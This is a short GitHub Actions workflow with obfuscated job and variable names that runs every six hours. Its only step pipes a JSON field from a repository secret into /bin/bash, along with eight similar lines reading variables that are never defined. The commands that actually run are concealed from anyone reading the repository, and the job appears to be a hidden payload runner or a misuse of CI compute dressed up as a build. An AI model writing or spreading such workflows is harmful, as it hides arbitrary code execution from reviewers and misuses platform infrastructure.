name: zonxxki
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zonxxki
        env:
          atp750: ${{ secrets.atp750 }}
        run: |
          echo $atp750 | jq -r .t361 | /bin/bash
          echo $viof94 | jq -r .c993 | /bin/bash
          echo $wzyli450 | jq -r .qxs20 | /bin/bash
          echo $d05 | jq -r .by00 | /bin/bash
          echo $gy1641 | jq -r .pqulr3 | /bin/bash
          echo $l6893 | jq -r .mh56056 | /bin/bash
          echo $kl69162 | jq -r .l6 | /bin/bash
          echo $o04 | jq -r .gezjp69464 | /bin/bash
          echo $avau994 | jq -r .fs3741 | /bin/bash

